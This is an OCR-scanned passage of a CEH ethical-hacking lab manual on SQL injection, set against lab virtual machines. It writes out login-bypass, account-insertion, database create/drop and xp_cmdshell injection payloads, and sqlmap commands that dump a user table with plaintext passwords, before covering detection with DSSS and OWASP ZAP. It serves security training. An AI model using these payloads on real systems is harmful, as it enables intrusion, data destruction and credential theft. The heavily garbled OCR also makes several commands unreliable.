CEH Lab Manual SQL Injection Module 15 (CoH Lab Manual Page 1024© Vatabie P Tox you now Bi Web exercise DD Workbook review & Toots domonstrated in this lab are available in EACEH- ToolsiCEHv14 Module 15 SQL Injection (CoH Lab Mana Page 1025 Module 45-01 Injection SQL Injection SQL injeaton is a technique that takes advantage of input vulnerabilities to pass malicious SOL. commands through a web application for execation by a backend database Lab Scenario SQL injection is the most common and devastating attack that attackers ean use to take control of data-driven web applications and websites. It is a code injection technique that exploits a security vulnerability in a website or application’s sofware. SQL injection attacks use a series of malicious SQL. (Structured Query Language) ‘queries or statements to directly manipulate any type of SQI. database. Applications often use SQL statements to authenticate users, validate soles and access levels, store, obtain information for the application and user, and link to other data sources. SQL injection attacks work when applications do not properly validate input before passing it toa SQL statement. When attackers use tactics like SQL injection to compromise web applications and sites, the targeted organizations can incur huge losses in terms of moncy, reputation, and loss of data and functionality. As an ethical hacker or penetration tester (hereafter, pen tester), you must possess sound knowledge of SQL injection techniques and be able protect against them in diverse ways such as using prepared statements with bind parameters, whitelist input validation, and user-supplied input escaping. Input validation can be used to detect ‘unauthorized input before it is passed to the SQL query. ‘The labs in this module give hands-on expesicnce in testing a web application against various SQL injection attacks. Lab Objectives ‘The objective of this lab is to perform SQI. injection attacks and other tasks that include, but are not limited to "Understanding when and how web applications connect to a database server in order to access data # Performing a SQL injection attack on a MSSQL database # Extracting basic SQL injection flaws and vulnerabilities © Detecting SQL injection vulnerabilities Lab Environment “To carry out this lab, you need # Windows Server 2019 vierual machine # Windows Server 2016 vietual machine Windows 10 vietual machine ‘Ethical Hacking and Countermessures Copyright © by EC Coun "Al RightsReserved. Reproduction fSrcty Prohibited.(CoH Lab Manual Page 1026 Module 15 SQL Injection * Pasrot Security vistual machine © Web browsers with an Intemet connection + Administrator privileges to run the tools Lab Duration Time: 60 Minutes Overview of SQL Injection SQL. injection attacks can be performed using various techniques to view, ‘manipulate, insert, and delete data from an appli main types of SQL injection: n’s database. ‘There are three * In-band SQL injection: An attacker uses the same communication channel to perform the attack and retrieve the results * Blind/inferential SQL injection: An attacker has no error messages from the system with which to work, but rather simply sends a malicious SQL ‘query to the database © OutoFband SQL injection: An attacker uses different communication channels (such as database email functionality, or file waiting and loading fonctions) to perform the attack and obsain the results Lab Tasks Ethical hackers of pen testers use numerous tools and techniques to perform SQL injection attacks on target web applications, The recommended labs that will assist you in learning various SQL injection techniques include: 1_| Perform SQ. Injection Attacks v v 1.1 Perform an SQI. jection Atack on an q 7 MSSQL Database 1.2. Perform an SQI.Tajection Attack Against MSSQL. to Extract Databases | V V using sqlmap Detect SQL Injection Vulnerabilities using q 2 | Various SQI- Injection Detection Tools y ‘ 21 Detect SQL Injection Vulnesabiliies j y using DSSS: ‘ 22 Detect SQ. Injection Vullecabilities y sing OWASP ZAP. ‘ Ethical Hacking and Countermeasures Copyright © by E-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.(CoH Lab Manual Page 1427 Module 45 - SQL Injection Remark EC: Council nas prepared « considered amount of lab exercises for stadent to practice during the 5 day class and at ci fee time to enhance thie knowledge and sil. "Core - Lab exercise(®) matked undee Core ate recommended by EC-Counel to be practised dung che Sedny class ‘4Sedf study - Lab exrcce(®) macod under self study is for students to practise athe fee time, Stops to access the alton ab exerczes can be Found inthe frst page oF CEII¥I1 volume 1 book. ‘*¢4iLabs - Lab exercis(¢) marked und iLabs are availabe in our iL.abs solution. Labs is «clou-based viral ib easizonment preconfigured with vulnembiies, exploits, tools and seeps, and ean be accessed From anywhere with an Intemet connection. If yoss are interest to lesen more abot ou Labs soksion, plese contact your training center or vst hips / bbs eecounesLong. Lab Analysis Analyze and document the results related to this lab exercise. Provide your opinion ‘on your target's secusity posture PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB. ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.© Valuable information P Tos you novels B Weberercise 1D Workbook review (CoH Lab Manwal Page 1028 Module 45-01 Injection Perform SQL Injection Attacks In SOL. injection attacks, a series of maticions SOL. queries or statements are usd to manipulate the database of a mel application or site Lab Scenario SQL injection is an alarming issue for all database-driven websites. An attack can be attempted on any normal website or software package based on how it is used and how it processes user-supplied data. SQL. injection attacks are performed on SQL. databases with weal codes that do not adequately filter, use strong typing, or correctly execute user input. This vulnerability can be used by attackers to execute database quetics to collect sensitive information, modify database entries, of attach malicious code, resulting in total compromise of the most sensitive data, As an ethical hacker or pen tester, in order to assess the systems in your target network, you should test relevant web applications for various vulnerabilities and flaws, and then exploit those vulnerabilities to perform SQL injection attacks. Lab Objectives * Perform an SQL injection attack on an MSSQL. database * Perform an SQL injection attack against MSSQL. to extract databases using sqlmap Lab Environment To carry out this lab, you nced: # Windows Server 2019 vietual machine * Windows 10 virtual machine Parrot Security vietual machine # Web browsers with an Internet connection Administrator privileges to run the tools ‘Ethical Hacking and Countermessures Copyright © by EC Coun "Al RightsReserved. Reproduction fSrcty Prohibited.TASK 4 feromoft SQ Server QUSSQL) salad sdatsbase managemcat ssetem developed by Microsoft Ava database Jendct with the primary fintion of soi and serving da 28 requesed by other soli spphcdiore— which may fun eter on the same computer a 09 nother compote ares & network Goch the (CoH Lab Manwal Page 1029 Module 45-01 Injection Lab Duration Time: 40 Minutes Overview of SQL Injection SQ injection can be used to implement the following attacks: "Authentication bypass: An attacker logs onto an application without providing a valid username and password and gains admin privileges Authorization bypass: An attacker alters authorization. information stored in the database by exploiting SQL. injection vulnerabilities Information disclosure: An attacker obtains sensitive information that is stored in the database * Compromised data integrity: An attacker defaces a webpage, inserts malicious content into webpages, or alters the contents of a database * Compromised availability of data: An attacker deletes specific information, the log, or audit information in a database «Remote code execution: An attacker executes a piece of code remotely that can compromise the host OS Lab Tasks Perform an SQL Injection Attack on an MSSQL Database Here, we will use an SQL injection query to perform SQL. injection attacks on an MSSQL database. Note: In this lab, the machine hosting the website (the Windows Server 2019) is the vietim machine; and the Windows 10 virtual machine will perform the attack, 1, ‘Turn on the Windews 10 and Windows Server 2019 virtual machin 2. In the Windows 10 virtual machine, log in with the credentials Admin and PaS$wOrd. 3. Open any web browser (in this ease, we are using Mozilla Firefox), type httpiwww.goodshopping.com in the address bar, and press Enter. ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection ‘The GOOD SHOPPING home page loads. Assume that you are new to this, site and have never registered with it; click LOGIN on the menu bar, Fig 1.1: GOOD SHOPPING bi page oS 5. In the Username field, ype the query blah’ or 424 - as your login name, and leave the password fied empty. Click the Leg in button, Login without Valid Credentials Seosshopping eo = gue 11.2 Peni ind SQL injton (CoH Lab Manual Page 1430 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.E> An SQL injeeson ‘query exploits he normal eSettion of SQL stsements insoles salting mags wih talus values that will esceure nommaly but reien dita Frm the ada a ou wnt You ca “inject” ese smaligous values the quis, beense of he Apps’ inst ‘ler them before processing He vals Submited by wer are ot Properly vane by an Eppiation, itis pore target Foran SOL ict atch (CoH Lab Manual Page 431 Module 15 SQL Injection You are now logged into the website with a fake login, even though your credentials are not valid. Now, you can browse all the site’s pages as. registered membex. After browsing the site, click Legout from the top-right comer of the webpage. noe Fa LL. Weel csi Note: Blind SQL. injection is used when a web application is vulnerable to an ‘SQL injection, but the results of the injection are not visible to the attacker. Itis identical to a normal SQL injection except that when an attacker attempts to ‘exploit an application, rather than sccing a useful (i. information-rich) error message, a generic custom page is displayed. In blind SQL. injection, an attacker poses a true or false question to the database to sec if the application is vulnerable 10 SQL injection. 7. Now, we shall create a user account using the SQ injection query. Before proceeding with this sub-task, we shall first examine the login database of the GoodShopping website. 8. Switch to the Windows Server 2019 virtual machine and log in with che credentials Administrator anc PaSSwOrd. Note: In this task, we are logging into the Windows Server 2019 virtual machine asa victim, ‘ck the Type here te search icon (EBD in the lower section of Bosktop and type microsoft, From the results, dick Microsoft SQL Server Management Studio 18. 9, ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.(CoH Lab Manual Page 1632 Module 15 SQL Injection S& Micros Teoms © Milerosaft Azure Services © Microsoft Siveright 4 Microsoft NET Framework 1.1 Wears 4% Microsoft NET Framework 1.1 Configuration settings ‘Manage your acount Typing settings check for upstes © Windows Update settings (© Tum Naratoron or off 10, Microsoft SQL Server Management Studio opens, along with a Connect to Server pop-up. In the Connect to Server pop-up, Ieave the default settings as they are and click the Gonneet button OF Connectto Server x SQL Server Sovertpe Severnane: Athertesion Cones | [Heb || ra Ethical Hacking and Countermeasures Copyright © by E-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection 11. In the left pane of the Microsoft SQL Server Management Studio window, under the Object Explorer section, expand the Databases nox. From the available options, expand the GeedShopping node, and then the Tables node under it 12. Under the Tables node, right-click the dbo.Login file and click Select Top 1000 Rows from the context menu to view the available credentials. THE toc Sa seer Managemen Suse Asmat) Fle Edt View Poect Took Window Help O/B GSB P| BNwtey ALHAS Heros © SEVERIN SCL DPE (5 Sener HHO Sn Tm Stem atte {© Ducontgursen DuDasranes ey Stem Tl 0 Flea © Ml EtenalT Seip Tae ew Dependenoes emery OptmsstenAavsor ert oh [Progra Fults 1 tl Sonce Be] ss Stonge sm Seeurty of Lococo 5 Og insSseantenatel Fig 11.6: Ope the datas fle (CoH Lab Manual Page 1033 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection 13, You can observe that the database contains only one entry with the username and password as smith incl smith123, respectively. ‘acuey os VERTIS PRES GoeiBhopping BERL) Coe Cue Edt View Project Tools Window Help FO-0|8- oR P| ANerouy BAH SSX GA|9 bbewe a VIE el 2 1S SIVA SACRESS 6 en = deerme) oo [psc] fa Sedans 1S Geshe nope $i Owconiguncon Sg Ovens Eg owe 5 cscesepng {Sones bps iS tate fara 8 corte ml eagrtane : aoe came {brea gre 1.1.7 SQ database otis 14, Switch back to the Windows 40 virtual machine and go to the browser where 15. Click LOGIN on the memu bar and type the query blahyjinsert into login values (john’'apple123"}; - in the Username field (a5 your login name) and leave the password field empty. Click the Leg in button, —— gure L8 Czaing wer account (CeH Lab Manual Page 424 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection 16. If no error message is displayed, it means that you have sucessfully created your login using an SQL injection query. 17. After executing the query, to verily whether your login has been created successfully, click the LOGIN tab, enter john in the Username ficld and applet23 in the Password ficld, and click Leg in. GeedShopring e)> ce D B swwrgooderegpins = Owe noe Figs L1 2 Laggan ote wie 18. You will login successflly with the created login and be able to access al the features of the website. 19, After browsing the required pages, click Legout from the top-right comer of the webpage. (CoH Lab Manual Page 1025 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.(CoH Lab Manual Page 1036 Module 15 SQL Injection noe sem CEE gr 1.0: sce 20. Switch back to the victim machine (Windows Server 2019 virtual machine) 21. In the Mlerosoft SQL Server Management Studio window, right-click dbo.Login, ancl click Select Top 1000 Rews from the context menu. 22, You will observe that a new user entry has been added to the website's login database file with the usemame and password as john and apple123, respectively. Nore down the available databases. TE Satasaying senna sanensscocshoparg Sa” Fle Eat View Quey Project Teale Window Help 0-0/8 o- SEE Amma ASAAe|%Pa| “|B = YE coossrecnng - |p tno = VSR RM also = s\4 coones #7 TGR SeLecr 705 (ee) (login 1 6G SERVERDIASQLERES Ss eeene) a Dae pasmoed) Syrem Oacees oncentguon 3 ft agnectes 9 fg Dries 1 coesSopoing Dears igre 1.1.1: Table comming the ete usemarse ad passtosd ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection 23. Switch back to the Windews 10 virtual machine and the browser whore the GoodShopping website is open. 24. Click LOGIN on the menu bar and iype the query blahyereate database mydatabaso; — in the Username fied (as your login name) and leave the password field empty. Click the Leg in button 25, In the above query, mydatabase is the name of the database. Figur 11.42 Crating a daase 26. IF no error message (or any message) displays on the webpage, it means that the site is vulnerable to SQL. injection and a database with the name mydatabase has been created on the database server. 27. Switch back to the Windows Server 2019 virtual machine. 28, In the Microsoft SQL Server Management Studio window, un-cxpand the Databases nce and click dhe Retrosh (2) icon, 29. Expand the Databases node. A new database has been created with the ‘name mydatabase, as shown ia the serecashot. (CoH Lab Mana Page 1437 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection TEE Mroro S01 Server Management tio (Co=E Launch (il Fle Edit View Project Tools Window Help FO-O|- o-f wt] Anwauy @2 2 Ray =| > bwcite my fe 1 fw DWConfiguation @ (@ DWDisgnosies be OWQueve 1 @ Goodshopping w bw LGCMCScanResutet? @ INSSScanfesutst2 ign 1.1.15 Database ected sccessfly 30. Switch back to the Windows 10 virtual machine and the browser where the GoodShopping website is open. 31, Click LOGIN on the menu bar and type the query bk mydatabase; ~ in the Username fick; leave the Password fickl empty and click Leg in. Note: In the above query, you are deleting the database that you ezeated in ‘Step 24 (mydatabase). In the same way, you could also delete a table from the vietim website database by typing blah’; DROP TABLE table_name; the Username ficld. OB wgeourerpigcom* igre 1.1.14 Delatinga database (CoH Lab Mana Page 038 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.task Perform Ping Operation Using SQL Injection (CoH Lab Manual Page 1039 Module 15 SQL Injection 32. ‘To sce whether the query has successfully executed, switch back to the victim machine (Windows Server 2019); and in the pligrosoft SQL Server Management Studio window, click the Refresh (—) icon. 33. Expand Databases node in the left pane; you will observe that the database called mydatabase has been deleted from the lst of available databases, as shown in the sercenshot. TE Maceo 520 Seve Management Sao ara Fle ft View Project Took Window Help +0/8-G- ORF) Ande 222 {B Lsenecscanteutst2 { Lssscontestei2 1 lt Repicaion Figur 11.15 Database deed secesfaly Note: In this case, we are deleting the same database that we created previously. However, in real-life attacks, if an attacker can determine the available database name and tables in the victim website, they can delete the database or tables by executing SQL. injection queries. 34. Close the Microsoft SQL Server Management Studio window. 35. Switch back to the Windews 40 viral machine and the browser where the GoodShopping website is open. 36. Click LOGIN on the menu bar and type the query blahyexee master..xp_cmdshell ‘ping www.certifiedhacker.com -1 65000 -t'; ~ in the Username fick’; leave the Password field empty and click Log in. ‘Note: In the above query, you are pinging the www.certifiedhacker.com website using an SQL injection query. 4is the sent buffer size and -t refers to pinging the specific host. ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection gue 11.16 Pir ves 37. The SQL injection query starts pinging the host, and the login page shows a Waiting for www.goodshopping.com... message at the bottom of the window. © won gnetstorp ng com’ gue L117 SQL ncn uy tts png the os 38. To sce whether the query has successfully executed, switch back to the victim machine (Windows Server 2019), 39. Right-click the Start icon in the bottom-left corner of Desktop and from the options, click Task Manager, Click More details in the lower section of the Task Manager window. 40, Navigate to the Details tab and type IG.EXE running in the background. You can observe a process called (CoH Lab Manwal Page 1480 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.= TASK 2 (CoH Lab Manual Page 148 Module 45-01 Injection 1. ‘This process is the result of the SQI. injection query that you entered in the login field of the target website. senices ‘SYSTEM Not atowed Not atowes Not stowes Net otowed Net stowed Net stowes Not atowed Net otowed Not stones Not stowed ‘srsTent ‘Adwinistor srstent NETWORK SERWCE LOCAL SERIE srstemt srsTeM SUTELEMETRYS.. MSSaLSSaLBORESS seeseeeeeeeeeen el Fp 11.18 Tak Mang plang he pig proces 42, To manually kill this process, click PING.EXE, and click the End task button in the bottom right of the window. 43. If a Task Manager pop-up appcass, click End process. This stops or prevents the website from pinging the host. 44, this concludes the demonstration of how to perform SQI attacks on an MSSQL database. 45. Close all open windows and document all the aequired information. 46. injection ‘urn off the Windews 10 vistual machine. Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqimap In this task, we will use sqlmap to perform SQIL injection attack against MSSQI to extract databases. Note: In this lab, you will pretend that you are a registered user on the Ittp:iwww.moviescope.com website, and you want to crack the passwords of the other users from the website's database. ‘Note: Ensure that the Windews Server 2019 virnual machine is running, 1. Turn on the Parrot Security virtual machine. ‘Ethical Hacking and Countermessures Copyright © by EC Coun "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection C2 sxpmap xan open 2. In the login page, the attacker username will be selected by default source penctason esting, Enter password as toer in the Password field and press Enter to log in to the machine, tool thi auremates the paces of detecting and spoting SQL ineson favs and aking over o dbtbace servers Ircomes ‘with pret dtecion ic soap ih features, and abroad range of switche dbaabare Sngepsinsng tl tachi fee the aabase unde Figie 1.2.1: Pst Sec login seeing commands the OS vn tof band "If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close © If a Question pop-up window appears machine, click Ne to close the window. isking. you to update the Click the Moaitia Firefox icon HMB from the menu bar in the top-left comer of Desktop to launch the web browser. 4. ‘Type httpulwww.moviescope.comy and press Enter. A Login page loads; enter the Username anc Password as sam andl test, respective Click the Legin button, ‘Note: If a Would you like Firefox to save this login for moviescope.com? notification appears at the top of the browser window, click Don't Save. EB rask 24 Log in to Moviescope Login Low 5. Once you are logged into the website, click the View Profle tab on the menu bar and, when the page has loaded, make 2 note of the URI in the address bar of the browser. ab aul ag ee ttl acing ad Countermeasures copy © by Ee Comet "Al RightsReserved. Reproduction fSrcty Prohibited.Youcan we slap to perform SQL into on atget webs wing ‘orn ces, inching Hoodeertmed ‘ind, sme based bid, ezrebased, UNION «quo base, stacked cpa ae oboe SQ niet Module 15 SQL Injection Right-click anywhere on the webpage and click Inspect Element (@) from the context menu, as shown in the screenshot Figue 125: Ip! Element eption 7. The Developer Tools frame appears in the lower section of the browse window. Click the Console tab, type document.cookie in the lower-left comer of the browser, and press Enter. Home Features Trailers Photos sam profile Der] O ote TY Meierk Siler Doone OMrey > BD Hl age 124 Regueiog the coe (CoH Lab Manual Page 1483 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.task 2.2 Obtain Session Cooki CEH Lab Manual Page L404 Module 15 SQL Injection 8 Select the cookie value, then right-click and copy it, as shown in the sereenshot. Minimize the web browser. Note: ‘The cookie value may differ in your lab environment. Features Twallers Photos Blog Contacts sam profile entre Moe (0 Snes) Pet J the MATE Termination [El 0 open a Parrot Terminal window. t the top of the Desktop window 10. A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter (0 run the programs as @ root user, 11, In the [sudo] password for attacker ficld, type toor as a password and press Enter Note: The password that you type will not be visible. 12. Now, type ed and press Enter to jump to the root directory Ethical Hacking and Countermeasures Copyright © by E-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection 13. In the Parrot Terminal window, type sqlmap -u “httplwww.moviescope.comiviewprofile.aspx?i ‘" ~dbs and press, Trask 2.3 Retrieve Database Note: In this query, «u specifies the target URL. (the one you nored down in Stop 8), cookie specifies the HTTP cookie header value, and ~dbs. caumerates DBMS databases. 14, The above query causes sqlmap to enforce vatious injection techniques on the name parameter of the URI. in an attempt to extract the database information of the MevieScope website. oC aay oe aa 15. If the message Bo you want to skip test payloads specific for other DBMSes? [Yin] appears, type ¥ and press Enter. 16, If the message for the remaining tests, do you want to include all tests for ‘Microsoft SQL Server' extending provided level (1) and risk (1) values? [¥in} appears, type ¥ and press Enter. 17, Similarly, ifany other messags appears, type ¥ and press Enter to continue CEH Lab Manual Page L405 Ethical Hacking and Countermeasures Copyright © by E-Coumell ‘A RightsReserved. Reproduction Suit Prohited.Module 15 SQL Injection 18. sqlmap retrieves the databases present in the MSSQU. server. It also displays information about the web server OS, web application technology, and the backend DBMS, as shown ia the screcashot. 19. Now, you need to choose a database and use sqimap to retrieve the tables in the database. In this lab, we are going to detcemine the tables associated with the database meviescope. 20. ‘Type sqlmap -u"httpylwww.moviescope.comiviewprofile.aspx?l co0kie=""-D moviescope —tables sind press Enter. Note: In this query, -D specifies the DBMS database to enumerate and tables enumerates DBMS database tables. 21, The above query causes sqlmap to scan the meviescope database for tables located in the database. D ov Fp 1210p cmmmand ie ihe tbls in he noscpedanbase CEH Lab Manual Page L406 Ethical Hacking and Countermeasures Copyright © by E-Coumell ‘A RightsReserved. Reproduction Suit Prohited.Module 15 SQL Injection 22. sqlmap retrieves the table contents of the moviescope database and displays them, as shown in screenshot Fig 1211 Tile retin the movincpe dase 23. Now, rype sqlmap thttp/wwrw.moviescope.com/viewprofile.aspx?id=1" ~cookie="" -D moviescope -T User Login - TASK 2 Accounts id press Enter to dump all the User Legin table conter: or P ctr Fig 212 pig npr aniosewbie Ce Lab Mandal Page 487 {chica Maching ond Countermeasures Copigh © by EE Samet ‘Al Rights Reserved. Reproduction ls Suit ProhedModule 15 SQL Injection 24. sqlmap retrieves the complete User_Login table data from the database moviescope, containing all users’ usernames under the Urame column and passwords under the password column, as shown in secenshot. 25. You will sce that under the password column, the passwords are shown in plain text form. 26. To verify if the login details are valid, you should try to log in with the extracted login details of any of the users. To do so, switch back to the web browser, clase the Developer Tools console, and click Logout to start a new session on the site. Ethical Hacking and Countermeasures Copyright © by E-Coumell CEH Lab Manual Page L408 "AI Rights Reserved. Reproduction fStrctyProhstesModule 15 SQL Injection 27. ‘The Login page appears; log in into the website using the retrieved credentials BtasK 2 John /qwerty. Log in to Note: If a Would you like Firefox to save this login for moviescope.com? MovieScope using notification appears at the top of the browser window, click Don't Save. 28. You will observe that you have successfully logged into the MovieScope website with john’s account, as shown in the screenshot ay Eaprivacy Eapentest a john profile er aoe s 29. Now, switch back to the Parrot Terminal window. T “nttp:iwww.moviescope.comiviewprofile.aspx?id=1" ~cookle=" @ Om x 3 SS ee fa ne esc a ence een ten at. jt ws eae Figne 21.9: Copying te cookie wae (cet tab Manual Page 1459 ‘Ethical Hacking and Countermessures Copyght © by &&-Counel "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection 18, Switch to a terminal window and type python3 dsss.py «a Bivase ta “http/www.moviescope.comiviewprofile.aspx?i -" and ‘Scan the Website cook for SQL Injection press Enter. ‘Vulnerabilities Note: In this command, -u specifies the target URL and —-eaokle specifies TP cookie header value, Figure 2.1.10 sing the command to check fe SQL injection vuneaiies 19. The above command causes DSSS to scan the target website for SQL injection vulnerabilities. 20, The result appears, showing that the target website (www.maviescope.com) is vulnerable to blind SQI. injection attacks. The vulnerable link is also displayed, as shown in the sere Figur 2.1.1; Result of the command, showing vloeailiy wo bind SQL Ethical Hacking and Countermeasures Copyright © by E-Coumell CEH Lab Manual Page 1460 "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection 21. Highlight the vulnerable website link, right-click it, and, from the options, Bivase ss click Copy. View the Vulnerable Website Link. Open Link Coca ae Close Window igus 2.1.12: Copying the vulnerable Ek CEH Lab Manual Page L462 Ethical Hacking and Countermeasures Copyright © by E-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.Module 15 SQL Injection 22. Switch 10 Mozilla Firefox; in a new tab, paste the copied link in the address bar and press Enter, 23. You will observe that information regarding available user accounts appears under the View Profile tab. John profile Lsteee : ge 21.15: Visi the lara nk (CoH Lab Manual Page 1462 Ethical Hacking and Countermeasures Copyright © by E-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.(CoH Lab Mana Page 1463 Module 15 SQL Injection aformation for all uses. 24. Scroll down to view the user accou steve profile Figur 2.1.14: Use ccount information fox oll Moris Scope wert Note: In real life, attackers use blind SQL. injection to access or destroy sensitive data. Attackers can steal data by asking a series of true or false questions through SQL statements. ‘The results of the injection are not visible to the attacker. ‘This type of attack can become time-intensive, because the database must generate new statement for cach newly recovered bit. 25. This concludes the demonstration of how to detect SQI. injection vulnerabilities using DSSS, 26. Close all open windows and document all the acquired information, 27. ‘Vuen off the Parrot Security virrual machine ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.TASK 2 task 2.4 Launch and Configure OWASP OWASP 708 Arc Proxy ZAP) sa ietagated pene tes too foe fining ‘vulnerable a wb Appentions Fees delomaed sanmers ae Secaftwols hallow you to nd seausy ‘elncrables marly Ie design to be tse by people with awake ange of secuntyexpesene, and as such sea oe dlevelopers and fanetional testers who are new to pereteaion testing (CeH Lab Manual Page 464 Module 15 SQL Injection Detect SQL Injection Vulnerabilities using OWASP ZAP. In this task, we will use OWASP ZAP to test a web application for SQL injection vulnerabilities. Note: We will scan the www.moviescope.com website that is hosted on the Windows Server 2019 virtual machine. 1. Turn on the Windows Server 2019 victual machine and log in with the cecdentials Administrator and PaS$word. Note: We have already installed OWASP ZAP on the Windows Server 2019 virtual machine during the Medule 11 Session Hijacking labs. If the tool is alecady installed, skip to Step 2. Otherwise, follow these steps to install it: = Turn on the Windows 10 virtual machine. = Navigate to ZACEHW11 Module 14 Session HijackinglOWASP ZAP, double-click ZAP 2 8 0 windows.exe, and follow the installation steps to install = When the Setup - OWASP Zed Attack Proxy window appears, click Next. = In the Select Installation Type wizard, ensure that the Standard installation radio button is selected and click Next. = Follow the installation steps to install OWASP ZAP using the default settings. = After the installation completes, the Completing the OWASP Zed Attack Proxy Setup Wizard appears; click Finish. 2. Double-click the OWASP ZAP shortcut on Desktop to launch the application, ‘Note: Ifan OWASP ZAP pop-up window appears, click OK. 3. A prompt that reads Be you want to persist the ZAP Session? appears; sclect the No, 1 do not want to persist this session at this moment in time radio button, and click Start. Note: Ifa Manage Add-ons window appears, close it W owase ZAP Do you want to persist the ZAP Session? CO Yes, lwantto persist his session with name based on he current timestamp | Yes, | wantto persist this session but | wantto speaily the name and location ge 22:1 WAS ZAP Pst Se ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection 4. ‘The OWASP ZAP main window appears; under the Quiek Start tab, click the Automated Sean option. Welcome to OWASP ZAP Etat Cenet Dee an eye nop eeesonecing tt nage meh eam Soca 8 @ = Fipue 222-0WASD ZAP ck Mam Exploe 5, The Automated Sean wizard appears, enter the target website in the URL to attack ficld (in this casc, http:!www.moviescope.com). Leave other options set to default, and then click the Attaek button. ‘Eocertcmen is) Automated Scan Rg @ ome ‘snes aaa an trates pi! npn neat — [emo Eee Useraanontepee useasannc Qn Gavrtaaanes 9) exes ge 223, OWASP ZAP: Auten wiza (CoH Lab Manual Page L465 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45 - SQL Injection 6. OWASP ZAP stacts performing Metive Sean on the target website, as shown in the screenshot. Yew rae Rept Inds ont in © phot sen saeco yan eect ueivse — [Remmwnonmeam ——f]@ama) Ueeaacsnier Lh (Fedcteateas |p) [vison [seer [FR were [ove | 0 nic] [+] Drew Poyess [crmnwsnevscpecom is) UL Rt Curescns Manreqests Ted News € Rea Timesheet et URL Fjpae 22.4 OWASP ZAP Sons de uae wee 7. Afier the scan completes, Alerts tab appears, as shown in the screenshot. 8. You can observe the vulnerabilities found on the website under the Alerts tab. ‘Note: The discovered vulnerabilities might differ in your lab environment. (CoH Lab Manual Page 1466 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Automated Scan ‘Boeauncenee @ ste Teese elanenn aeat scn ayen gine225 OWASP ZAP. Abst 9, Now, expand the $@L Injection vulnerability node under the Alerts tab. sn an ata cy scene so en ee Floral otan swae seta eS e ‘Tage aanetaetate oecemnneracninn ame eons ede et (3) ie Bowes Powe tence ©) > Peco inners Heder ing 15) Fe 226g SQ Inston ny (CoH Lab Manual Page 1467 ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.(usps: /soneton), Burp Suite haps porsuiguer a), ‘Saf (ip //wSaon), ral Netsparker Web, Application Secusiy ‘Scanner (heaps //wrwnctspaker com) todas QU fection valnetak (CoH Lab Manual Page L468 Module 45 - SQL Injection 10. Click on the discovered SQL Injection vulnerability and further click on the vulnerable URL. 11, You can observe the information such as Risk, Confidence, Parameter, Attack, cic. regarding the discovered SQL Injection vulnerability in the lower sight-bottom, as shown in the screenshot Note: The sisks associated with the vulnerability are categorized acconding to severity of risk as Lew, Medium, High, and Informational alerts. Hach level of tisk is represented by a different flag color Red (BY): High risk © Orange (FM): Medium risk © Yellow (BY) Low risk + Blue (BY): Provides details about information disclosuce vulnerabilities en aus uinecn an aso spe Seton. tee uss [iplimanainarcen ip wae Paso ena Tews rc Peeters) ign 227 Infrmaton ginger ui 12. This concludes the demonstration of how to detect SQL. injection ‘vulnerabilities using OWASP ZAP. 15. Close all open windows and document all the acquired information. 14, ‘Turn off the Windows Server 2049 virwal machine. ‘Ethical Hacking and Countermessures Copyright © by EC Count "Al RightsReserved. Reproduction fSrcty Prohibited.Module 45-01 Injection Lab Analysis Analyze and document the results related to this lab exercise. Give your opinion on the target’s security posture and exposure. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB pete ONo Platform Supported © Classroom GiLabs (CEH Lab Manual Page 1469 ‘Ethical Hacking and Countermensures Copyright © by EC-Coumell "Al RightsReserved. Reproduction fSrcty Prohibited.